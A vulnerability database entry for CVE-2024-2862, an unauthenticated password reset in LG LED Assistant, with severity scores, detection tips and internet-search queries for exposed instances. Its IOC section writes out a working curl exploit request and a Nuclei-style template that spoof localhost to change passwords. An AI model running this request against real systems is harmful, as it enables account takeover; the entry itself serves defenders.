cbcvebase.
CVE-2024-2862
published 2024-03-25

CVE-2024-2862: This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
51.28%
98.8th percentile
This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.

Affected

2 ranges
VendorProductVersion rangeFixed in
lglg_led_assistant
lg_electronicslg_led_assistant

Detection & IOCsextracted from sources · hover to see the quote

url/api/changePw
port8787
commandcurl -k -X PUT -H 'X-Forwarded-For:127.0.0.1' -d 'newPw=Password@123&hostName=hostName&to=to&user=user&from=from' 'https://:8787/api/changePw'
sigma
id: CVE-2024-2862
info:
  name: LG LED Assistant - Unauthenticated Password Reset
  author: beginee
  severity: high
http:
- raw:
  - |
    PUT /api/changePw HTTP/1.1
    Host: {{Hostname}}
    X-Forwarded-For: 127.0.0.1
    User-Agent: test
    Content-Type: application/x-www-form-urlencoded

    newPw={{new_password}}&hostName={{hostname}}&to=to&user={{username}}&from=from
matchers:
- type: dsl
  dsl:
  - 'contains(body, "{\"resCode\":\"SUCCESS\"}")'  
  - 'status_code == 200'
  condition: and
  • Detect PUT requests to /api/changePw with an X-Forwarded-For header value of 127.0.0.1 — this is the attacker's method to spoof localhost and trigger unauthenticated password reset.
  • A successful exploit returns the JSON response body {"resCode":"SUCC"} or {"resCode":"SUCCESS"} — monitor HTTP responses on port 8787 for these strings following PUT /api/changePw requests.
  • Use Shodan query 'http.title:"LG LED Assistant"' or FOFA icon_hash '195291629' to identify exposed LG LED Assistant instances on the internet.
  • The vulnerable logic resides in Common.js — endpoint /api/changePw — monitor for unauthenticated PUT requests to this path on the application server.
  • ·At time of advisory publication, no vendor patch or mitigation was available for LG LED Assistant v2.1.65.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.1CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.